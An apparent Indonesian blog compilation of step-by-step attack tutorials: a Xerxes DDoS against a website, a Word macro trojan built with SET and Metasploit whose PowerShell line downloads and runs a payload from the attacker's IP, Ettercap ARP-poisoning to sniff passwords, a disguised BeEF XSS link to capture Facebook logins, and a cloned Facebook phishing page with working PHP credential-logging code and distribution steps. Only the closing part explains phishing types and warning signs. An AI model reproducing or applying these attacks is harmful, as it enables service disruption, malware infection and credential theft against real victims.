Ddos Attack Dengan Xerxes Di Kali Linux

Saya akan memberikan sedikit tutorial Cara Ddos dengan Xerxes di Kali Linux. Ddos (Distributed Denial of Service) merupakan sebuah serangan yang dilancarkan oleh attacker terhadap sebuah komputer, website atau server.

Oke langsung saja, pertama kita harus mencari target/website yang akan kita ddos nantinya. Contohnya website "http://namaweb/"

Selanjutnya, kita download tools xerxes melalui website http://pastebin.com/yTarAJY6 dan pilih get/download untuk mendownloadnya.

Setelah anda download, letakkan file di Desktop. Dan klik kanan pada file tersebut lalu properties, dan ubah nama file menjadi xerxes.c
Selanjutnya kita buka terminal dan masuk ke folder Desktop, dan lakukan compile file tersebut sehingga terbentu sebuah file baru. Dengan perintah:
"gcc -o xerxes xerxes.c"

Setelah itu, kita berikan hak akses penuh terhadap file tersebut, dengan mengetikkan,
"chmod 777 xerxes"

Selanjutnya, kita lakukan proses ddos yaitu dengan command berikut :
"./xerxes namawebsite 80"
 

Proses ddos akan berjalan, semakin banyak yang melakukan ddos terhadap target semakin cepat target tersebut akan down.

Sekian mengenai DDOS dengan Xerxes di Kali Linux, gunakan lah pada tujuan edukasi dan jangan disalah gunakan.

Membuat Trojan Pada File Word


Haiii gaaaeeesss...
Dari artikel sebelumnya, kita tau apa itu Backdoors, dan bagaimana membuatnya pada pdf file. Nah di artikel ini, yang akan dibahas adalah bagaimana membuat trojan pada file Word atau pada doc file. Hal-hal penting yang diperlukan adalah :
1. Kali Linux 1.09a (dijalankan secara virtual pada Virtualbox)
2. Microsoft Word
3. Jaringan internet (Pastikan target dalam satu jaringan)
4. Metasploit Framework
5. Obfuscate.jar (program tambahan untuk membuat file terinfeksi trojan)


Obfuscate disini berguna untuk mengambil data dari server dan akan menyimpannya pada clipboard. Obfuscatre.jar disimpan pada sistem operasi yang sudah memiliki program Microsoft Word, agar mempermudah saat memindahkan trojan ke file yang sudah ada.

Okeee gaess.. langsung mulai ke tahap awal :
1. Buka Application > KaliLinux > Explotation Tools > Social Engineering Toolkit > Setoolkit
2. Setelah jendela Terminal terbuka lalu pada menu kita pilih nomer 1 yaitu Social-Engineering Attacks

3. Pada menu selanjutnya pilih 10 yaitu Powershell Attack Vectors
4. Pada menu selanjutnya pilih 1 yaitu Powershell Alphanumeric Shellcode Injector. Lalu akan keluar tampilan untuk memasukkan IP Address dan port untuk payload listener (IP yang dimiliki). Setelah kita masukkan IP address dan port kemudian akan ada pilihan yes dan no : jika akan memulai listener secara otomatis berarti kita memilih yes, jika akan memulai listener secara manual berarti kita memilih nomor

5. Lalu buka root untuk memindah file .txt yang sudah dibuat pada powershell dengan command tersebut. File dipindahkan atau diupload ke server. Kemudian service apache2 di start.
6. Aktifkan metasploit dengan command msfconsole. Command-command dibawahnya untuk membuka koneksi bagi target yang telah membuka file trojan.
7. Buka aplikasi Obfuscate.jar untuk mengambil script yang sudah dibuat dan di upload pada server.
8. Masukkan link untuk mengambil script . Sesuaikan IP dari Server yang dituju.
Dan berikut merupakan command yang dimasukkan pada Obfuscate.jar. Command yang digunakan :

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))"

Jangan lupa mengubah IP 10.0.0.13 dengan IP dari pembuat trojan.

Setelah memasukkan Command dan mengubah IP, maka akan tampil script dari server dan akan otomatis tersimpan pada clipboard. Seperti gambar berikut:
9. Script akan dimasukkan pada macros yang ada di word yang telah disiapkan. Macros terdapat pada tab menu View.
10. Ketikkan Auto_Open pada textbox Macro Name. Lalu Pilih Document1 atau nama dokumen yang dibuat. Kemudian klik Create.
11. Lalu pada Macro windows yang terbuka, paste script yang sudah tercopy pada clipboard. Seperti berikut :
12. Simpan word yang sudah ada script macros, yang telah terinfeksi virus. Sampai tahap ini trojan telah jadi dan di embed pada word.
13. Sisipkan file word yang sudah terinfeksi pada desktop, agar mempermudah untuk dibuka.
14. Ketika Word sudah dibuka oleh target maka akan tampil pada Kali Linux IP dari target.
15. Kemudian kita dapat melihat data dari target dengan mengetik command sysinfo. Untuk mengetahui informasi dari sistem.
16. Jika IP sudah didapat, maka kita dapat melakukan remote desktop, atau screensoot dan lain-lain pada desktop target, dengan mengetahui segala command yang ada pada help command. Seperti screenshoot desktop target:
Yaa begitu kiranya gaess yang mau coba2 ngerjain orang dengan virus trojan, hihihi... Tapi langkah-langkah tersebut berhasil jika semua keamanan target tidak aktif yaa gaess...

Tutorial MITM Kali Linux

Setelah artikel sebelumnya membahas tentang MITM secara detail dan cukup jelas, kali ini gw akan memberikan tutorial singkat sebelum bermain logika untuk jaringan yang lebih besar maka gw akan praktekkan ini di lab gw pribadi, agar nggak ganggu jaringan lain baca dulu tentang MITM DISINI

Install dulu Kali linux, karena ini gw basik di linux gw masih belum butuh windows, oke mulai mengenal software MITM yang sering gw gunakan untuk menyerang di jaringan yaitu Ettercap seperti pada di bawah ini console dulu buka terminal kalian seperti pada gambar dibawah ini dan ketikan ettercap --help untuk melihat perintahnya apa aja :

oke pahami komen komenya, dan sekarang buka ettercap dengan mode GUI untuk lebih nyamanya dengan cara ketik " ettercap --gtk " dan akan tampil seperti pada gambar di bawah ini
Setelah muncul gambar seperti di atas yaitu menu ettercap sekarang masuk ke menu sniff dan pilih unified sniffing yang berada di ettercap di sebelah kiri atas dan pilih ethernet kalian jika menggunakan wifi maka gunakan wlan kalian karena lancard kalian wifi, dan jika Ethernet kalian menggunakan kabel maka gunakan Eth disini gw milih Eth0 perhatikan gambar dibawah ini dan tekan OK
Kemudian masuk ke menu host --> Host List --> Scan For Host dan lihat hasilnya seperti pada gambar dibawah ini
Terlihat ada beberapa host yang aktif pada jaringan gw coba perhatikan lagi gambar di atas, IP address dan juga MAC address terlihat jelas itu menunjukan bahwa komputer yang aktif pada jaringan ! nah sekarang coba lihat IP address kalian berapa , dan cek ip router yang ada pada jaringan kalian dengan cara membuka terminal baru dan ketikan " route -n"
Oke kalian sudah mengetahui ip dari router kalian sekarang saatnya melakukan MITM nih dengan cara masukan IP target ke target satu dalam Ettercap seperti pada gambar di bawah ini gw masukan di target 1 IP target dan juga target 2 Ip router, kalian bisa memasukan semua ip address yang terdaftar di jaringan ke target satu dan melakukan MITM kepada semua host yang aktif akan tetapi disini gw peraktek cuma satu perhatikan
Nah sekarang saatnya jalankan MITM kalian dengan cara masuk ke menu MITM dan jalankan ARP Possioning dan pilih sniff remote conections seperti pada gambar di bawah ini
Oke sekarang saatnya melakukan start sniffing untuk menjalankan MITM kalian dengan mode sniffing dengan cara perhatikan di halaman Ettercap kalian di sebelah kiri atas START --> START SNIFFING dan tunggu hingga ada data yang masuk dari ip tarrget lihat gambar dibawah ini
Tada.... kalian bisa mendapatkan password yang target kalian masukan ke web admin lihat username admin dan juga password fuckingshit :D kalian tidak hanya bisa sniffing dengan ini kalian bisa merubah paket chatting dan msih banyak yang kalian bisa lakukan yang akan gw bahas di artikel selanjutnya thanks dan selamat mencoba.

Tutorial Membuat Link Exploit Menggunakan BeEF Framework XSS di Kali Linux

Pertama untuk membuat sebuah link exploit adalah buka aplikasi “beef xss framework”. Lihat gambar yang dilingkari merah di bawah.

Lalu klik aplikasi beef –nya maka akan terbuka sebuah proses di terminal, tunggu saja hingga terbuka web browser.

Setelah terbuka web browser nya kita akan masuk ke page login / Authentication beef. Untuk Username dan Password ketikkan “beef” (tanpa tanda petik ganda).

Kemudian kita masuk ke halaman BeEF Control Panel, klik link dengan tulisan “here” yang ada di paling kanan. Lihat gambar yang dilingkari merah di bawah.

Akan terbuka sebuah tab baru di web browser anda, seperti gambar di bawah.

Pastikan anda telah terkoneksi dengan internet, kemudian kita akan cek ip address yang kita dapat, dengan cara buka terminal lalu ketikkan perintah “ifconfig” (tanpa tanda petik ganda). Lihat deret angka yang di highlight di bawah itu adalah ip address yang kita dapat, kita copy ip tersebut caranya klik kanan copy.

Paste kan ip address yang kita copy tadi ke tab The Butcher atau tab yang baru tadi, ganti dari ip 127.0.0.1 ke ip milik kita tadi. Lihat gambar di bawah.

Lihat gambar dibawah ip address nya sudah di paste atau di ganti dengan ip milik kita tadi, lalu tekan Enter.

Agar link exploit kita tidak terlihat terlalu mencurigakan kita akan coba menyamarkan link exploit tersebut, dengan cara meng-copy-paste-kan link tersebut ke bitly.

Buka website www.bitly.com lalu paste kan link kita tadi lalu klik shorten maka akan muncul link bitly baru yang merujuk ke link sebelumnya tadi.

Setelah link jadi kita bisa mengirim link tersebut ke target atau korban.

Kita bisa mengirim link tersebut melalui berbagai aplikasi chatting atau email dan melakukan berbagai cara agar korban mengklik atau membuka link tersebut.
Gambar di bawah adalah tampilan jika korban telah membuka link yang kita kirim tadi.
Kita kembali lagi ke tab browser BeEF Control Panel, disitu akan muncul ip address dan berbagai informasi device milik korban. Lihat gambar yang dilingkari merah di bawah.

Selanjutnya klik Commands, klik Social Engineering lalu klik Pretty Theft, ini digunakan untuk membuat web link yang diklik korban tadi menampilkan form login facebook. Terakhir klik Execute.

Andai si korban benar benar tertipu, dengan polosnya korban akan memasukkan Email dan Password facebook miliknya. Dan kita bisa mengetahuinya, lihat gambar di bawah.
Kita bisa melihat email dan password facebook yang diinputkan korban di BeEF Control Panel. Lihat gambar yang dilingkari merah di bawah.

Gambar lebih jelasnya Username = muhammadfahrizalirfandi dan Password = skk.

Dimohon untuk menggunakan informasi ini secara bijak, jangan sampai merugikan orang lain.

Bagaimana Membuat dan Cara Kerja Phising ?



Buat para phiser nih yang ingin membuat web phising, di sini saya akan berbagi tutorial cara membuat web phising. Web fake login, website yang menyerupai website halaman login aslinya.

Apa itu Web Phising?
Tentunya kalian sudah tahu kan apa itu web phising? seperti yang sudah saya jelaskan di atas, web phising adalah sebuah halaman login palsu yang menyerupai halaman login web aslinya.

Misal, Anda ingin membuat web phising facebook, tentunya Anda harus membuat website yang semirip mungkin dengan laman login facebook dong. Ini bertujuan agar si calon korban tidak curiga bahwa laman web tersebut adalah halaman login palsu.

Bagaimana Web Phising itu Bekerja?
Ada dua jenis cara kerja web phising, tentunya itu tergantung dari script phising yang Anda gunakan:
Send Mail
True Login

Script Phising send mail: Jika ada seseorang yang login ke halaman login palsu yang Anda buat, secara otomatis Anda akan menerima pemberitahuan (send mail) dari web phising yang Anda buat tadi yang berisi:
User / Akun email
Password
dan info penting lainnya

Script Phising True Login: berbeda dengan metode phising send mail, jenis script phising ini bisa dibilang sudah ketinggalan jaman. Anda harus mengakses cpanel web Anda untuk membuka hasil phising secara manual, tidak ada pemberitahuan apakah sudah mendapatkan korban atau belum.

Baca juga : Apa Itu Web Phising, Cara Kerja dan Menghindarinya

Pada kesempatan kali ini saya hanya membahas menggenai web phising.

Cara Membuat Web Phising
Misalkan kamu mau membuat web phising login facebook.com.

  1. Buka halaman login facebook.com seperti gambar diatas
  2. Klik kanan lalu pilih view source atau ctrl + u
  3. Copy semua script yang ada dengan cara tekan ctrl + a
  4. Pastekan di notepad
  5. Setelah itu cari kode "action=" (ctrl + f untuk mencari) lalu hapus alamat facebook ganti dengan nama "login.php" lalu simpan dengan nama index.html
  6. Copy kode dibawah ini lalu simpan dengan login.php
    <?php
    header(“Location: http://www.facebook.com“);
    $handle = fopen(“password.txt“, “a”);
    
    foreach($_GET as $variable => $value)
    
    {
    
    fwrite($handle, $variable);
    fwrite($handle, “=”);
    
    fwrite($handle, $value);
    fwrite($handle, “\r\n”);
    
    }
    
    fwrite($handle, “\r\n”);
    fclose($handle);
    exit;
    
    ?>
  7. Buka kembali notepad kosong dan simpan dengan nama password.txt
Buatlah Web Hosting
Buka website 000webhost untuk mendapatkan hosting dan domain gratis atau mungkin sediakan hosting yang sudah kalian beli

  1. Buka laman web 000webhost dan klik Free Sign Up.
  2. Masukan alamat email Anda (@gmail / @yahoo) terserah, yang penting email aktif dan Klik Sing Up.
  3. Cek kotak masuk Email kalian dan konfirmasi pendaftaran akun 000webhost “Click here to verifly your email”.
  4. Lewati semua laman panduan, atau jika Anda inginkan baca juga tidak apa-apa. 
  5. Isi nama website dan password. 
  6. Scroll kebawah dan cari menu Upload Own Webite 
  7. Disinilah script phising yang kalian buat tadi akan di upload. 
  8. Klik Icon Upload Own Website dan unggah script phising kalian. 
  9. Buka File Manager dan Extrat script phising yang kalian upload tadi. 
  10. Copy link website phising dan sebarkan. 
Disni saya anggap kamu sudah mengerti bagaimana cara upload file di web hosting. Jadi, saya tidak menjelaskannya disini.

Cara Mendapatkan Korban Phising
Mau tau bagaimana seorang hacker menyebarkan web phising mereka untuk mendapatkan calon korban?
Dalam artikel ini kita akan membahas tentang cara hacker menyebarkan web phising.

Phishing adalah kejahatan dunia maya di mana target atau sasaran dihubungi melalui email, telepon atau pesan teks oleh seseorang yang menyamar sebagai lembaga yang sah untuk memikat individu agar memberikan data sensitif seperti informasi yang dapat diidentifikasi secara pribadi, rincian kartu kredit dan perbankan, serta kata sandi.

Informasi tersebut kemudian digunakan untuk mengakses akun-akun penting dan dapat mengakibatkan pencurian identitas dan kerugian finansial.

Cara Menyebarkan Phising
Berikut ini adalah beberapa cara yang biasa di lakukan oleh seorang hacker dalam menyebarkan link phising:
  1. Malware
    Penipuan phishing yang melibatkan perangkat lunak jahat harus dijalankan di komputer pengguna. Malware biasanya dilampirkan ke email yang dikirim ke pengguna oleh phisher. Setelah Anda mengklik tautan, malware akan mulai berfungsi. Terkadang, malware juga dapat dilampirkan ke file yang dapat diunduh.
  2. Ransomware
    Ransomware menolak akses ke perangkat atau file hingga tebusan dibayarkan. Ransomware for PC’s adalah malware yang diinstal pada workstation pengguna menggunakan serangan rekayasa sosial di mana pengguna diperdaya dalam mengklik tautan, membuka lampiran, atau mengklik malvertising.
  3. Phishing melalui Mesin Pencari
    Beberapa penipuan phishing melibatkan mesin pencari di mana pengguna diarahkan ke situs produk yang mungkin menawarkan produk atau layanan berbiaya rendah. Ketika pengguna mencoba membeli produk dengan memasukkan rincian kartu kredit, itu dikumpulkan oleh situs phishing. Ada banyak situs web bank palsu yang menawarkan kartu kredit atau pinjaman kepada pengguna dengan harga rendah tetapi mereka sebenarnya adalah situs phishing.
  4. Injeksi Konten
    Injeksi konten adalah teknik di mana phisher mengubah bagian dari konten pada halaman situs web yang andal. Ini dilakukan untuk menyesatkan pengguna untuk pergi ke halaman di luar situs web yang sah di mana pengguna kemudian diminta untuk memasukkan informasi pribadi.
  5. Periklanan
    Malvertising adalah iklan berbahaya yang berisi skrip aktif yang dirancang untuk mengunduh malware atau memaksa konten yang tidak diinginkan ke komputer Anda. Eksploitasi dalam Adobe PDF dan Flash adalah metode yang paling umum digunakan dalam iklan.
  6. Sesion Hijacking
    Phisher mengeksploitasi mekanisme kontrol sesi web untuk mencuri informasi dari pengguna. Dalam prosedur hacking sesi sederhana yang dikenal sebagai sesi sniffing, phisher dapat menggunakan sniffer untuk mencegat informasi yang relevan sehingga ia dapat mengakses server Web secara ilegal.
  7. Trojan
    Trojan horse adalah jenis malware yang dirancang untuk menyesatkan pengguna dengan tindakan yang terlihat sah, tetapi sebenarnya memungkinkan akses tidak sah ke akun pengguna untuk mengumpulkan kredensial melalui mesin lokal. Informasi yang diperoleh kemudian ditransmisikan ke penjahat cyber.
  8. Keyloggers
    Keyloggers merujuk pada malware yang digunakan untuk mengidentifikasi input dari keyboard. Informasi tersebut dikirim ke peretas yang akan menguraikan kata sandi dan jenis informasi lainnya. Untuk mencegah penebang kunci mengakses informasi pribadi, situs web yang aman menyediakan opsi untuk menggunakan klik mouse untuk membuat entri melalui keyboard virtual.
  9. Link Phising
    Link phising adalah teknik di mana phisher mengirim tautan ke situs web palsu. Ketika pengguna mengklik link halaman fack login, itu membuka situs web phisher alih-alih situs web yang disebutkan dalam tautan. Mengarahkan mouse ke tautan untuk melihat alamat yang sebenarnya menghentikan pengguna dari jatuh cinta pada manipulasi tautan.
  10. Telepon Phising
    Phishing telepon, phisher melakukan panggilan telepon ke pengguna dan meminta pengguna untuk memanggil nomor. Tujuannya adalah untuk mendapatkan informasi pribadi dari rekening bank melalui telepon. Telepon phishing sebagian besar dilakukan dengan ID penelepon palsu.
  11. Situs Web Kartu Kredit Palsu
    Situs web kartu kredit palsu dapat dilakukan dengan sangat baik. Bahkan jika Anda mengunjungi situs web perusahaan kartu kredit Anda secara teratur, terlalu mudah untuk dibodohi. Phisher menggunakan banyak teknik canggih untuk membuat situs web palsu yang tampak mirip dengan rekan-rekan mereka yang sah. Dalam ketergesaan untuk mencari tahu apa yang salah, mudah saja jatuh ke dalam perangkap phisher.
  12. Email Bank Spoof
    Cara paling umum yang dilakukan phisher untuk menggulirkan serangan phishing bank adalah dengan mengirimkan ribuan email spoof. Email-email ini dibuat dengan hati-hati agar terlihat hampir identik dengan jenis-jenis korespondensi yang dikirim oleh bank-bank yang sebenarnya. Phisher yang terampil dapat mereplikasi logo, tata letak, dan nada umum email semacam itu ke tingkat yang tidak biasa. Mereka mengandalkan fakta bahwa kebanyakan orang cukup sibuk; sekilas, email spoof ini tampaknya sah. Akibatnya, penerima lebih cenderung menganggap serius apa yang tertulis di dalamnya.
Apa itu Phishing Email?
Email phishing mengacu pada tindakan membuat dan mengirim email palsu atau palsu dengan tujuan mendapatkan informasi keuangan dan pribadi yang sensitif. Di bawah skema semacam itu, email dirancang agar terlihat persis seperti yang dikirim oleh perusahaan yang sah. Serangan phishing yang canggih menggunakan alamat email orang yang terdaftar untuk menggunakan layanan tertentu. Ketika orang-orang menerima email yang seharusnya dari perusahaan-perusahaan itu, mereka lebih cenderung mempercayai mereka. Email palsu sering berisi link yang mengarah ke situs web palsu, di mana berbagai metode digunakan untuk meminta dan mengumpulkan informasi keuangan dan pribadi seseorang. Formulir terkadang juga terdapat di dalam email itu sendiri.

Mengapa Email Phishing Bekerja?
Mengingat berapa lama phishing email telah digunakan, mungkin aneh bahwa ini terus bekerja. Bukan karena orang bodoh; itu karena email ini dilakukan dengan sangat baik. Phisher tahu persis bagaimana merancang email palsu agar terlihat seperti rekan mereka yang sah. Dengan menggunakan bahasa yang mendesak, phisher secara dramatis meningkatkan peluang keberhasilan mereka. Orang yang sibuk memindai email semacam itu, mempercayai mereka, dan mengklik tautan mereka karena mereka terlihat hampir persis seperti aslinya. Satu klik yang salah dapat menyebabkan dunia terluka.

Tanda-tanda Phishing Email
Ada banyak tanda email phishing. Hal pertama yang harus Anda perhatikan adalah salam. Apakah itu menggunakan nama asli Anda, atau apakah itu memiliki salam generik? Perhatikan baik-baik header email itu. Apa alamat email pengirim? Alamat-alamat ini biasanya dirancang dengan cermat agar terlihat asli. Namun, dengan mencermati mereka, Anda biasanya dapat melihat ketidakkonsistenan dan hal-hal yang tidak masuk akal. Jika memungkinkan, bandingkan alamat email pengirim dengan pesan sebelumnya dari perusahaan yang sama. Jika ini email phising, Anda akan melihat hal-hal yang tidak bertambah.